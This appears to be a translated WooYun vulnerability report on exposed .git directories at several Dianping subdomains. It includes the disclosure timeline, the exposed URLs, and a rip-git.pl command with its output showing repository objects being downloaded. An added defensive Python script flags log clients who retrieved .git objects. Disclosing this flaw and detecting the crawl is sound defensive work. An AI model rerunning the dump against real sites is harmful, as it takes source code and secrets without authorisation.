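2014-12-30: Details reported to the vendor; awaiting vendor handling
2014-12-30: Vendor confirmed; details disclosed to the vendor only
2015-01-09: Details disclosed to core white hats and experts in the relevant field
2015-01-19: Details disclosed to regular white hats
2015-01-29: Details disclosed to intern white hats
2015-02-13: Details disclosed to the public

Source code of multiple Dianping (大众点评) subsites can be downloaded

http://app.t.dianping.com/.git/config
http://wap.dianping.com/.git/config
http://stat.api.dianping.com/.git/config

WooYun: Improper use of the git service at Umeng (友盟网) leads to source code disclosure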
[core]
    repositoryformatversion = 0
    filemode = true
    bare = false
    logallrefupdates = true
root@kali:~/dvcs-ripper# perl rip-git.pl -v -u http://stat.api.dianping.com/.git
[i] Downloading git files from http://stat.api.dianping.com/.git
[d] found COMMIT_EDITMSG
[d] found config
[d] found description
[d] found HEAD
[d] found index
[!] Not found for packed-refs: 404 Not Found
[!] Not found for objects/info/alternates: 404 Not Found
[!] Not found for info/grafts: 404 Not Found
[d] found logs/HEAD
[!] Not found for objects/53/d18de3c95a38a7d1835f84c44fe98ca3931ee7: 404 Not Found
[!] Not found for objects/c1/f15474ea70965c7b7d2889ef16fa949707b815: 404 Not Found
[d] found refs/heads/master
[i] Running git fsck to check for missing items
Checking object directories: 100% (256/256), done.
error: HEAD: invalid sha1 pointer dd9554a21996403b0189e476d4b9785d71e07a71
error: refs/heads/master does not point to a valid object!
[d] found objects/02/62ed39be1a9164ae28b70c88ba5d8c39c41539
[d] found objects/06/0c87968d255d922b58bbcc0ece7c656995107b
[d] found objects/0b/1262e7608b1945648ddffccbde1ff139fa5622
[d] found objects/0f/144685f7140d2694eeba5609322b4cd79f0bf8
[d] found objects/0f/d275e94660402f80f01505d28b90a23f7e0209
[d] found objects/11/5030dc889ca5f267bf2caf121ff3d3c2db277b
[d] found objects/14/3edf44b0daa4cef1a452ecccac21aee22a8d77
[d] found objects/1a/740d15247e7d136b2d2f452cefc4aa842a4c7b
[d] found objects/1d/eef144cb17ed2c11c6cdcdcb2d9530fa8d0b47
[d] found objects/1d/425cf7d7e25f81be64d32c406ff66cfb6c4766
du -h
24M ./objects
4.0K ./info
4.0K ./logs/refs/remotes
4.0K ./logs/refs/heads
12K ./logs/refs
20K ./logs
4.0K ./refs/remotes
8.0K ./refs/heads
4.0K ./refs/tags
20K ./refs
24M .
Delete
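A defender-side view of the crawl shown above, as an added example that is not part of the original report: it classifies clients in a web access log by whether their /.git/ requests were actually served. The log lines, client addresses and function names are constructed for illustration; the two object paths are the ones that appear in the rip-git.pl output.

```python
import re
from collections import defaultdict

# Constructed sample (combined log format); client IPs are documentation addresses.
SAMPLE_LOG = """\
203.0.113.7 - - [30/Dec/2014:10:00:01 +0800] "GET /.git/config HTTP/1.1" 200 92 "-" "-"
203.0.113.7 - - [30/Dec/2014:10:00:02 +0800] "GET /.git/HEAD HTTP/1.1" 200 23 "-" "-"
203.0.113.7 - - [30/Dec/2014:10:00:03 +0800] "GET /.git/packed-refs HTTP/1.1" 404 162 "-" "-"
203.0.113.7 - - [30/Dec/2014:10:00:04 +0800] "GET /.git/objects/53/d18de3c95a38a7d1835f84c44fe98ca3931ee7 HTTP/1.1" 404 162 "-" "-"
203.0.113.7 - - [30/Dec/2014:10:00:05 +0800] "GET /.git/objects/02/62ed39be1a9164ae28b70c88ba5d8c39c41539 HTTP/1.1" 200 812 "-" "-"
198.51.100.9 - - [30/Dec/2014:10:05:00 +0800] "GET /.git/config HTTP/1.1" 404 162 "-" "-"
192.0.2.4 - - [30/Dec/2014:10:06:00 +0800] "GET /index.html HTTP/1.1" 200 5120 "-" "-"
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')
GIT_RE = re.compile(r'/\.git/(.*)$')                      # path inside the repository dir
OBJ_RE = re.compile(r'^objects/[0-9a-f]{2}/[0-9a-f]{38}$')  # loose object = file content

def summarize_git_requests(log_text):
    """Per client: /.git/ paths that were served (HTTP 200) and paths that were not."""
    stats = defaultdict(lambda: {"served": set(), "missed": set()})
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        client, _method, path, status = m.groups()
        g = GIT_RE.search(path.split("?", 1)[0])
        if not g:
            continue  # not a request into a .git directory
        bucket = "served" if status == "200" else "missed"
        stats[client][bucket].add(g.group(1))
    return dict(stats)

def exposure_findings(stats):
    """Rank each client: probe-only < metadata-exposed < source-disclosed."""
    findings = []
    for client, entry in sorted(stats.items()):
        if any(OBJ_RE.match(p) for p in entry["served"]):
            level = "source-disclosed"   # object files left the server
        elif entry["served"]:
            level = "metadata-exposed"   # config/HEAD/index readable
        else:
            level = "probe-only"         # every request was refused
        findings.append((client, level, len(entry["served"]), len(entry["missed"])))
    return findings

if __name__ == "__main__":
    for row in exposure_findings(summarize_git_requests(SAMPLE_LOG)):
        print(row)
```

A "source-disclosed" result means repository objects were downloaded, so the code and any credentials committed to it should be treated as leaked even after the directory is deleted.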
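Severity: Medium
Vulnerability Rank: 8
Confirmed: 2014-12-30 16:28
Thank you for your attention to the security of Dianping.
2014-12-30: This is part of the code of the automated operations management system for production machines; none of the URLs involve business code.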